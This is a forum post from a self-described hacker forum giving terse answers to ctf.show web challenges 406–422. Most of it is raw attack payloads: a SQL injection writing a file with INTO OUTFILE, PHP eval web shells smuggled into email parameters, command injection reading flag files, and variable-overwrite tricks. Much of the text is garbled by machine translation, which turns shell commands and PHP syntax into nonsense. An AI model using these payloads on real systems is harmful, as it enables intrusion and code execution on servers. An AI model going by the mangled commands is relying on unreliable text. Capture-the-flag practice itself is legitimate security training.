• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

ctf_show-web入门-其他-(406-422)


Recommended Posts

406

http://www.baidu.com;union/**/select/**/1,(select/* */flag/* */from/* */flag)/* */into/* */outfile/* */'/var/www/html/flag。txt ' #

407

?ip=cafe:add

ip6地址,类的名字叫咖啡馆都是16进制

408

?email='?PHP eval($ _ POST[1]);'@123.php

409

2gibtazf1hw2721.png

注意这个是可以成功评价评价的,他把双引号前看做一个服务器端编程语言(专业超文本预处理器的缩写)脚本

?email=' flag eval($ _ POST[1]);'@123.com

410

?b=开

411

?b=是

412

ctfshow=?服务器端编程语言(Professional Hypertext Preprocessor的缩写)系统('猫flag.php ')?

这不是注释符号,直接传即可,注意追加的,错了重开环境

413

CTF显示=*/系统('猫旗。PHP’);/*

414

/?ctfshow=-1

415

?k=Getflag

416

?f[0]=ctff[1]=标志

或者

f=ctf:flag

417

?ctf=显示

418

拖到最下面还有内容

1shgzlrkxxz2722.png

die=0 clear=CP flag.php测试。文本文件(textfile)

变量覆盖

419

code=eval($ _ GET[1]);

或者

code=echo `tac fl *

420

代码=nl./*

421

荷兰f*

422

荷兰*

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now